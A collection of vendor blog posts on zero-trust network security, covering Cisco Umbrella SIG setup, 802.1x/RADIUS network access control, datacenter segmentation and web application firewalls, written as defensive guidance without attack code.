Umbrella SIG – Your Field Guide to Protecting the Remote User

The Problem

Here’s the situation – you have a group of users who work a hybrid schedule.  One of the users, while working at home, gets malware from a compromised website.  That malware-infected PC gets taken back to the office and put on the corporate network, whereupon the malware now can try and spread to other devices.  How do we protect against this kind of situation?

Historically, tools to manage remote device security on the endpoint itself were limited in their security capabilities or had undesirable effects on user experience.  Alternately, remote users would be required to VPN into the corporate office at time of boot, where all traffic would be sent over the VPN for processing by the on-premises security stack.  The first issue is that with a lot of remote users, the corporate firewall and the internet connections would be put under considerable load, perhaps enough to demand a larger firewall and faster Internet connections.  Second, there is a problem with what happens when the endpoint is off the VPN – there is still the potential for malware or user misbehavior in this case.  Setting up endpoints for always-on VPN (the VPN tunnel establishes itself pre-logon, usually with certificate based authentication) is a possibility, but always-on VPN is notoriously complex and finicky to deploy, making it a poor solution for most organizations.

Advanced Threats

Another demand on security is the need for SSL decryption to detect threats.  Modern malware also uses SSL encryption, and as such, is much harder to detect without decrypting and inspecting that traffic.  SSL decryption on an on-premises firewall has a substantial performance impact, often cutting firewall throughput in half or more – this makes it impractical for the traditional full tunnel VPN option.

A New Defense

These days, we have better tools.  A whole class of services known as SASE (secure access services edge) have arisen in response to the need to secure a distributed workforce.  However, SASE services all differ quite a bit due to how they’re implemented.  Most services require some form of always-on VPN for connection to the SASE service with all the complexity that entails to avoid the problem of what happens when the user isn’t on the VPN to the SASE service.

Our preferred SASE solution for remote workers is Umbrella SIG, as it addresses all the common problems I’ve discussed above.  SIG works a bit differently than other solutions, as it doesn’t rely on VPN connectivity.  Instead, traffic destined for the Internet gets proxied through the Umbrella cloud, where SSL decryption occurs, followed by inspection and filtering for malware and content restrictions. 

Agile and Effective: Umbrella SIG

So, what can SIG do from a security perspective? Here are the key capabilities:

  • File download scanning – files that match known malware signatures are blocked.
  • File type control – disallow users from downloading risky file types. For example, no normal user needs to download a .dll file to their laptop.
  • Detailed content filtering – block not just domains, but specific URLs within a domain. This is especially important with large, sprawling sites like Reddit that contain both legitimate and risky content.
  • Data Leak Prevention (DLP) – scan Internet-bound traffic for well-known or user defined data patterns that match controlled data such as credit card numbers or intellectual property.
  • SaaS Tenant Controls – keep users contained to the organization’s tenant for services like Microsoft 365.
  • CASB – Discover ‘shadow IT’ SaaS application usage and block access to those apps as needed.
  • Logging and Reporting – Get a clear picture of remote users’ Internet activities and what security events each user has caused.

SIG Simplifies Deploying SSL Decryption

Deploying SIG is much easier than most other SASE services. SIG has a streamlined deployment compared to other SASE services due to how it operates. As mentioned before, there is no need for always-on VPN or other invasive endpoint configurations that can break easily. Core features can also be implemented quickly – where there is complexity, it’s where it is inherent to the features available and not in setting up prerequisites. For example, SSL decryption will always need a certificate installed on the endpoint to not break the Internet, and choosing what to decrypt or not often needs input from other parts of the organization to ensure users’ private information isn’t compromised (think banking or medical information here – stuff that can cause liability to the organization by inspecting it.)

Your Umbrella SIG Deployment Guide

Here’s a guide to getting SIG up and running – this assumes that you currently have a fully functional Umbrella DNS deployment and want to expand that to SIG. I don’t go into the more complex features here, so consider this a starting point, not an authoritative guide.


Enable the Secure Web Gateway (SWG) capability remotely. Note that this requires the use of the new Cisco Secure Client (aka Anyconnect 5.0 or later) to work. SWG can be enabled globally or on a per-identity basis.

Install the Umbrella root certificate on the PCs/Macs to protect. Alternately, if you already have a local CA, your cert can be used in place of the Umbrella cert. Without this, enabling SSL decryption will completely break the Internet for the unfortunate users.

Next, define a list of categories, applications, and URLs to bypass SSL decryption. Some sites will need to be bypassed for functionality purposes (ex: Windows Update) while others will need to be bypassed for non-technical reasons (banking, health, or other sites that can leak protected information.)

Now it’s time to set up a SWG policy. First, we create a destination list (or several, as needs direct). Destination lists are how content filtering policies are applied. If you have a pre-built list of domains and URLs to filter, they can be imported into a destination list via .csv file.

Next, we configure the Web policy.

First, configure the global settings for the ruleset. This is where SSL decryption, file controls, logging, and general security settings are configured. Let’s start with SSL Decryption.

Enable the feature and associate a selective decryption list with it. Next, configure the other global settings as appropriate.

Following this, configure a ruleset for content filtering using the destination lists we created earlier. The individual rules follow the same mode of operation as an ACL – once a match occurs, traffic is either blocked or forwarded, so be careful of rule order to avoid shadowing. Be sure to add identities to each rule and ruleset for them to be applied!

Finally….

Test SWG settings before rolling it out to the entire organization. Note that once SWG is enabled globally, any endpoint with Secure Client and the Umbrella agent component will then forward all traffic to the Umbrella cloud to be proxied. No policy is applied unless identities are added to rulesets, so impact will be minimal until appropriate rulesets and identities are configured.

Zero Trust in the Campus

Zero Trust in the Campus

Controlling Network Access

Securing Infrastructure Access

When looking at what the major risks are to the security and functionality of IT infrastructure, near the top is access to that infrastructure.  Being able to ensure that only authorized devices and users can connect to the network is one of the most effective ways of protecting your infrastructure and data.  Users who pick up malware from outside the corporate network can easily bring it in via their machines, or bad actors can attempt to place a device within the network to easily launch attacks on the infrastructure from the inside.  And it’s not just a security thing – one of the most aggravating components of ‘shadow IT’ is the random devices users bring in and attach to the network.  Printers are probably the most common, but other things like networked music players are a notable hassle.  And the worst of all is users bringing in network devices like unmanaged switches that can actually cause an outage.  Situations like this are what network access control (NAC) systems are for.

So what is a NAC system?

In a nutshell, the primary job of a NAC system is to authenticate users and devices so that they can use the organization’s network and then log those accesses.  More advanced NAC systems can also provide conditional access for devices – a device joining the network can be profiled and screened for things like an up to date OS, the presence of antimalware software, or even force an antimalware scan prior to gaining full access to the network.  The most complex NAC deployments will add network segmentation to all of the above – users are dynamically assigned to a VLAN or SSID, or have a dynamic ACL applied based on their role in the organization.

How do NAC systems function?

NAC systems, regardless of vendor, all rely on the same core technologies to function, which are RADIUS and 802.1x.  This is meant more as a short overview, not a deep dive into the intricacies of RADIUS or 802.1x.  We’ll also avoid looking at vendor-specific capabilities, such as Cisco’s Scalable Group Tags (SGTs), as those don’t see much use and rely on a single vendor environment.  First is 802.1x, the core technology for allowing or disallowing access to the network. Keep in mind that 802.1x is a function of the access device (switch port or wireless AP), not the NAC software – it’s common to see a NAC system from one vendor and access switching from another vendor in the same environment. 

NOTE: All modern OSes (Windows, Linux, MacOS) have 802.1x client (aka supplicant) functionality built in, so no 3rd party software is necessary on the client side.

Besides standard client OSes, 802.1x client functionality also exists in a number of specialty devices, including network infrastructure like routers, switches, and APs.  We’ll address that use case later.  The other thing to keep in mind about 802.1x is that it’s a layer 2 protocol – authentication information is sent even before a device can get an IP address.  That way, it’s simply not possible for unauthenticated devices to obtain an IP address in a well-designed NAC deployment. 

What if the device in question is a printer, IP phone, or other device without 802.1x awareness? 

There is a feature available called MAC Authentication Bypass (MAB) that forgoes the 802.1x process and instead, uses the device’s MAC address (learned from a single frame) as the credential to authenticate against.  Keep in mind that MAB is not very secure – spoofing MAC addresses is very easy to do, especially with wireless devices.  MAB shouldn’t be used except as a last resort, and additional security, such as network segmentation via a firewall, should always be considered when dealing with devices that must use MAB.

Further explaining the authentication process

The other part of the authentication process is the access device communicating with the NAC server.  This back-end communication is done using RADIUS.  RADIUS has a very long history as an AAA protocol, dating back to the days of dial-up Internet, and has stuck around because its capabilities are broadly useful for all manner of network access control regardless of media type.  Once an access device has received 802.1x information, it will translate that to a RADIUS request and send it on to the NAC server.  From there, the NAC server will consult its internal user and machine database or an external user database (e.g. Windows Active Directory) to determine if the device should be granted access to the network.  In the case of MAB, that will be a pre-populated list of MAC addresses that the NAC server will refer to.  RADIUS doesn’t just handle authentication, either.  RADIUS can be used to push a dynamic ACL based on user role or device type, or dynamically assign a port to a specific VLAN based on user role or device type.  This kind of dynamic segmentation is quite advanced, though, and is definitely not for a NAC beginner.

Now, let’s discuss NAC deployment

Our prior topics have generally been invisible to end users and limited to key points within the enterprise network.  Thus, even with areas that have complex security needs, like machine-to-machine security in the datacenter, there is minimal worry about messing with the end user experience or causing high-visibility problems.  NAC changes that dramatically – now we’re directly impacting end user experience if things go wrong.  To be honest, we’ll be directly impacting end user experience when things go right – remember that a NAC system is not just security, but shadow IT control. Expect user complaints when the printer they snuck in no longer works.  It still beats having people sneak in printers, in my opinion.

Deploying NAC is going to be complex

This article is not trying to build a complete guide to NAC deployment.  Rather, I want to discuss general principles and best practices to make sure that your NAC deployment doesn’t cause too much pain.  The first thing to consider is where 802.1x should be enabled.  Best practices for NAC say that any means of network access (switch ports, APs) that aren’t in a secured environment should be enabled for NAC.  That’s why APs and switches come with 802.1x supplicant capabilities – a user-accessible AP or small switch in an office could otherwise be unplugged and an unapproved device can then be attached to the network. You’ll also want to inventory network devices and determine where using MAB will be necessary. Be sure to record those MAC addresses, too.

So what’s next?

The initial deployment is the next step. Build the NAC servers, integrate with any external resources like AD, and start with a small test deployment.  The IT department always makes for a good guinea pig.  This test deployment should start in open mode – network access is always allowed, but all 802.1x and RADIUS exchanges are logged.  Review the logs and address any errors, then move to closed mode, where network access is now conditional on successful authentication.   There will likely be some issues that weren’t caught or only appear in closed mode.  Make note of anything particularly troublesome for when the wider deployment is carried out.

Next, prepare for the general rollout

Since this involves client machines, make sure the helpdesk team is in the loop and is trained in how to deal with the inevitable issues that will surface and work closely with the desktop team to make the needed changes to enable 802.1x (for a Windows shop, traditional GPOs or InTune can be used to do this).  Procedures will also need to be updated – don’t forget that.  It’s way too easy for NAC to turn into an unmanageable mess without good procedures.  Above all, communicate with the users about the process well in advance.  Be sure to have a good answer as it relates to things like printers and other devices brought in by users.  Just cutting them off causes more problems than it solves, no matter how satisfying it may be.  This is, honestly, the hardest part of a NAC deployment and the biggest cause of failures.  Nothing sinks a project faster than agitated users and their managers.  Now is also the time to remediate any potential issues that have been found in the pilot deployment if they appear to be widespread.

You’re done prepping, its time to deploy

Now that the preparatory work has been done, it’s time to move on to the large-scale deployment.  Feel free to split this up further for large deployments or if there are lots of remote sites.  Just like the pilot, start with everything in open mode and log errors or failed authentications.  Remedy those issues as appropriate.  Once the technical issues have been resolved and any ruffled feathers have been un-ruffled, it’s time to move to closed mode.  Once again, communications from IT to the rest of the organization is key.  I can’t state enough how important it is, really.  No matter how much work is done prior to this step, there will be issues.  Address the users with respect and courtesy, and always be flexible.  It’s not uncommon for some devices to just plain refuse to work with 802.1x no matter what, short of a full reimage. 

Some final thoughts

NAC systems are a powerful tool in your journey towards zero trust, but the user impact should always be top of mind.  This is definitely one of those projects where a good services partner can have a big impact – a team that’s done dozens of NAC deployments has seen numerous ways things can go wrong and can streamline the NAC deployment dramatically.

By Chris Crotteau

Machine to Machine Security

Zero Trust in the Datacenter

Machine to Machine Security

How Machine to Machine security differs from User to Machine

Now that we’ve looked at user to machine security in the datacenter, it’s time to look at machine to machine security (also known as east-west security).  The goals of machine to machine security are going to be quite different than user to machine security, and those goals will also depend on what types of applications and uses your data center will have.  For most datacenter environments, the primary goal of machine to machine security is to provide a last line of defense in case an intruder has managed to gain a foothold in your organization’s infrastructure.  This is not a reason to ignore machine to machine security! 

Remember: One of the core parts of the zero trust philosophy is to expect that intrusions will happen or may even be happening right now. 

Without machine to machine security, an intruder who gains access or control over a server now has free reign to move laterally to other, more important machines that may contain valuable data and do so undetected (or at least until everything’s encrypted and you’re being asked for Bitcoin). Once we add machine to machine security, moving laterally within the datacenter becomes a much bigger challenge – working around security and avoiding detection takes time and skill, buying you enough time to detect the intrusion before it can be successful.  At a lower level, the goal of machine to machine security is to ensure that servers (whether bare metal or virtualized in some way) only ever communicate to other specific servers and only using the ports and protocols needed for application functionality.  Anything out of the ordinary should be logged, and some particular traffic types being detected should raise an alert of some variety. 

An example of this would be two servers that only communicate via HTTPS – only port 443 should be allowed, and if one server attempts to open an SSH session to the other server, immediately email the security team – bad things are afoot if that’s happening.

Chris Crotteau

How do we implement Machine to Machine security?

With the importance of machine to machine security now clear, it’s time to discuss how it can be implemented.   Before any purchases of hardware or software are made, planning and design work is key.  Machine to machine security is complex, no way around it, and planning is key to having a successful deployment.  The first step is to build a data flow diagram – map out what machines should talk to what other machines and what ports should be allowed.  This will be the primary document used to build the security policy, so do not neglect this at all.  Next up is to determine as best as possible what the east-west throughput needs are.  Security throughput is expensive and in the context of datacenter traffic flows, is potentially a substantial bottleneck. There are a couple of ways to effectively provide machine to machine security, but to start with, there’s one way this shouldn’t be done, and that’s with traditional security ACLs. 

Note: While an ACL is a simple way to better secure things when looking at user to machine security, ACLs in the context of machine to machine security are unwieldy and hard to manage.  This leads to either hard to troubleshoot connectivity problems or user error accidentally leaving things open that shouldn’t be. 

The preferred tools are either physical or virtual firewalls – central management reduces the possibility of user error and advanced security features mean that more effective filtering, logging, and alerting is available.  The easier way to do east-west security is to segment based on server group.  In this kind of setup, like servers can communicate with each other directly, but will need to traverse a firewall to communicate with other types of servers.  For example, a database server cluster can freely communicate with its other cluster members, but to communicate with a web server, the communications have to pass through a firewall.  This kind of segmentation tends to be easier to maintain and have a minimal performance impact (assuming the firewall is sized correctly), since filtering is done on a limited scale and can be centralized in a single pair of security appliances.  No host involvement is needed here and device count is low, so small teams can effectively manage datacenter segmentation this way.

Complex datacenters and Machine to Machine security

For those organizations that provide multitenant services or who have the budget and staff to handle a very complex datacenter environment, the best security is provided through microsegmentation – instead of segmenting based on server group and only firewalling communications between groups, microsegmentation is the firewalling of every server from every other server.  The benefits are obvious – with every server’s traffic being inspected, the ability to detect and quarantine a compromised server before damage is done is much more robust.  This does come at the expense of significant deployment and maintenance complexity, though.  On the deployment side, microsegmentation can’t be effectively done with a pair of firewalls in the services leaf. Instead, a host-based system like VMWare NSX, per-host deployments of a virtual firewall like the Palo Alto VM series, or a microsegmentation-oriented networking system like Cisco’s ACI will be needed to ensure security throughput scales with host count.  On the management side, some form of automated rule creation is necessary – each VM deployed has its own security rules, and manually adding those rules to each firewall instance every time a new VM is deployed is not a practical thing to do.  This means building, testing, and maintaining a scripting infrastructure alongside everything else needed for proper microsegmentation. 

On the deployment side: Microsegmentation can’t be effectively done with a pair of firewalls in the services leaf. Instead, a host-based system like VMWare NSX, per-host deployments of a virtual firewall like the Palo Alto VM series, or a microsegmentation-oriented networking system like Cisco’s ACI will be needed to ensure security throughput scales with host count.

On the management side: Some form of automated rule creation is necessary – each VM deployed has its own security rules, and manually adding those rules to each firewall instance every time a new VM is deployed is not a practical thing to do.  This means building, testing, and maintaining a scripting infrastructure alongside everything else needed for proper microsegmentation. 

Combining the Machine to Machine strategies

Another approach to machine to machine security is to look at a hybrid of both models – high risk servers like internet-facing Web servers are subject to microsegmentation, while other types of applications only have filtering between server groups.  This way can tame the potentially extreme complexity of a full microsegmentation environment for applications that aren’t quite as much a security risk while gaining the security advantages for servers that are the most likely to end up compromised.

Zero Trust Philosophy Index

This series in security philosophy will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur.
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.

What is a Zero Trust Philosophy?

Zero Trust: Its a philosophy, not a plan

The Mindset

One of the current trends in IT security that gets a lot of press and discussion is the idea of zero trust.  Zero trust, however, is really a philosophy, not a plan of action.  Specifically, zero trust is the philosophy that all IT resources, whether internal or external, should be treated as untrusted or even potentially compromised.  While this philosophy is simple, applying it to a live environment can be anything but simple!  Adopting a zero trust mindset requires a holistic approach to security and good cooperation between all stakeholders in the organization in order to execute on this philosophy.  This even extends beyond the technology infrastructure and onto the employees and even organizational policies themselves. 

It’s important to keep in mind that the threat landscape is always changing – what may have been good practice five years ago may not be so today. This is what drove us at Crossconnect to develop a series of posts laying out how to adopt a zero trust philosophy in your organization.

Getting Started

This series will explore various aspects of technology infrastructure with an eye towards how things are built when done so with a zero trust mindset.  Before we get into those details, it’s always best to take some time to think about the big picture questions – many of the areas of security that we’ll talk about will have options that range from ‘very simple’ to ‘year-long project.’ Being able to figure out where effort needs to be made will go a long way towards creating an effective security infrastructure for your organization. 

Foundations of Zero Trust Philosophy

The first step in planning is to think about the capabilities of your organization and the threats you’re likely to face.  Many threats are industry or organization specific, but there are some that are universal.  First, of course, is ransomware – probably the biggest general threat most organizations will face.  Fraud and theft also rank high in terms of general threats.  Sometimes, the organization’s data itself is the target – there are plenty of groups out there who want confidential information for any number of reasons, even just to leak to the public.  And finally, compromising your organization may be done so that the bad actors can gain access to a 3rd party’s network via yours – think contractors and other service providers.

Next, look at your internal capabilities.  Security is, unfortunately, time-consuming to manage.  As such, it gets hard to manage some solutions with limited staff and budget.  Consider what your organization is capable of managing and monitoring when looking at security products and services – a simple but well-managed system is going to be more effective than a very capable, yet complex and maintenance-intensive system that gets neglected.

Once you have a good understanding of what your threats and capabilities are, then it’s time to build a plan.  The core of a security plan is to look at the applications in use, files/information that needs access, and the infrastructure that they run on, then figure out who/what needs access.  The goal is to limit access for any device, user, or application to only the resources it needs. 

Zero Trust Philosophy Index

This series will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.  

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.

User to Machine Security

Zero Trust in the Datacenter – Protecting Your Servers from Your Users

For the first part of our explorations of the zero trust philosophy, we’re going to look at the datacenter. 

user to machine security, protecting the datacenter

It’s All in the Flow

When we look at the datacenter we have two types of traffic flows, each of which needs to be looked at from a security perspective.  First is user to machine security.  Protecting one’s datacenter resources from the users has always been a necessity, however the types of threats and what we consider a user have changed a lot over the years.  Second is machine to machine security.  This area of datacenter security is much newer and has historically been challenging and expensive to implement.  We’ll be focusing on user to machine security for now – machine to machine security will be discussed in a future post.

Note: What we discuss here can easily be applied to servers located on-prem, co-located, or even in the public cloud. 

On to User to Machine Security

The primary type of user to machine security is what’s commonly referred to as north-south security, where the focus is on Internet users.  Exposing necessary resources to the Internet is a requirement for obvious reasons, but Internet-based threats are omnipresent and can be of considerable sophistication.  It may seem obvious, but it bears repeating that any security policy should be built with only the necessary access privileges granted.  For Internet-facing users, this is usually easy – modern websites/applications usually just require that HTTP/HTTPS traffic coming in on ports 80 and 443 is allowed.  Legacy applications can complicate this process, though, so always work with the application team to understand all requirements for the application to function and build access policies appropriate to your environment.

Beyond simple access controls, it’s important to also consider what the users are inputting into the application. 

For example, putting malicious information in an HTTP POST request is a very common way of trying to get the application to give up information, grant inappropriate access requests, or otherwise misbehave in a way beneficial to the attacker.  How to abuse application inputs is going to be firmly out of scope for this post – whole books have been written on how to exploit things at the application level.  Addressing this kind of abuse is also more complicated, too.  Port and protocol filtering is really a go/no go type of rule, while inspecting inputs is a lot more complicated due to the much more open nature of user inputs.  There are application best practices for sanitizing user inputs, but especially with proprietary applications, it’s not always possible to do so.  It’s also better to be able to stop malicious traffic before it touches the application.  For this, we most commonly use a web application firewall (WAF). 

What is a WAF?

With a WAF, we can look directly at the payload of interesting packets and filter based on their contents.  For example, a field on a website that’s meant for name input shouldn’t ever have SQL syntax appearing in it.  On the WAF, a rule is created (using lots of regexes!) to ID anything like this and block it. WAFs and similar application specific security tools are, unfortunately, a Very Hard Thing to implement.  The nature of a WAF means that HTTPS traffic needs to be decrypted, which presents challenges in not breaking TLS.  Once that’s been dealt with, building appropriate rules needs close collaboration between the security and application teams to ensure that the WAF is blocking everything it should be, and that rules are updated as applications are updated or as threats emerge.  The infamous log4j vulnerability is one that a good WAF rule can easily block, but building that rule requires good Javascript knowledge and an understanding of how the vulnerability is exploited.  To see what a sample WAF rule blocking log4j exploit attempts looks like, F5 has a ready to go iRule available here

Other Machine to User Security Considerations

The next part of user to machine security is a somewhat newer topic in security – protecting your datacenter resources from your own users.  This is also referred to as internal segmentation.  Historically, trying to firewall your users from your datacenter was difficult, expensive, and of limited value.  Times have changed, and we’re at a point where your users can be as dangerous to the business as an Internet based threat.  Studies done on where attacks gain their initial foothold show that 90% or more attacks begin with a user opening a malicious email or running a bad executable file.  Once run, the malware will begin to crawl the network looking for other vulnerabilities to gain a foothold in the datacenter and then go to work exfiltrating or encrypting data or otherwise disrupting business operations.  With a traditional setup where internal users are considered trustworthy, their traffic is considered good by default and doesn’t warrant being firewalled.  This is not a good stance to have considering the above statistic. 

Callout: Internal segmentation of some variety should be considered a need to have in a modern security-first network design. 

Implementing Internal Segmentation

This is one of those tasks whose complexity is hard to determine.  On the simple end of the spectrum, putting some basic security ACLs in place at the border device between the DC and the users is surprisingly effective for the amount of effort it takes to implement.  Most organizations should be looking at a firewall for this purpose, though.  Modern firewalls will have many more options for inspecting traffic, detecting threats, and alerting IT staff when something is detected.  Some features are actually easier to implement on an internal segmentation firewall, too.  SSL inspection is one of the best examples of this.  Cracking open TLS traffic is a notoriously resource intensive task and if done for Internet-bound traffic, can easily overwhelm a firewall, break websites, or potentially cause HR issues when specific types of user communications are inspected (banking and health information are two major no-nos for deep packet inspection).   SSL inspection, when done between users and the datacenter, has none of these concerns.  Traffic volumes between users and the DC are often well-known and don’t change much, so firewalls can be effectively sized to avoid performance issues.

For user information concerns, interaction with internal resources and data is pretty much open season for whatever security you want to implement – there’s nothing in, say, an employee’s interactions with the organization’s ERP system that would be out of bounds to inspect, log, and audit.

Some Final Considerations

One final thing to consider is how to treat access for 3rd party contractors and how to properly categorize their traffic.  The prevailing wisdom these days is to treat 3rd party contractors as equivalent to Internet-facing users, as several high profile intrusions were launched via a 3rd party with direct access to sensitive resources.  It’s a little more difficult, though – simply just allowing ports 80 and 443 through to a list of servers isn’t enough.  3rd party contractors may need specialized access or just require a large number of permit rules compared to either an employee or Internet user, so close coordination with your 3rd party is required to keep access requirements to a minimum.  Due to the complexity of building network-based security policies suitable for contractors, another option that we’re seeing adopted more lately is deployment of jump servers with enhanced access management software, such as what Bomgar or SecureLink provide.  This type of software provides additional capabilities to the IT staff, such as full session monitoring, access notification, and the ability to only allow logins at specific times or only if explicitly approved by the IT staff.  With this level of control on the jump server, it becomes easier to build other security policies in a much more general way.  Since all users are accessing resources via a jump server, access control rules only have to permit a small number of hosts from known subnets, and detailed application based or port/protocol based rules can often be omitted or reduced in complexity.

Zero Trust Philosophy Index

This series in security philosophy will explore the areas of security that need to be addressed in order to make your plan a reality and to discuss specific areas of focus on how to apply a zero trust mindset.

  • Datacenter
  • Route/switch
    • Features that ensure integrity of network operations
  • Wireless
    • Capabilities for detection and mitigation of RF based attacks
  • Endpoint
    • Network Access Control (NAC) – Ensuring that endpoint activity is controlled and that security threats are detected and mitigated before an exploit can occur
  • Network Security
    • Ensuring that all traffic through the network is controlled and monitored for malicious activity
  • Cloud Security
    • Ensuring that user to cloud access is controlled and that cloud resources are appropriately provisioned and accounted for.
  • The Human Factor
    • Ensuring that end users are aware of security issues and responsible for their security choices.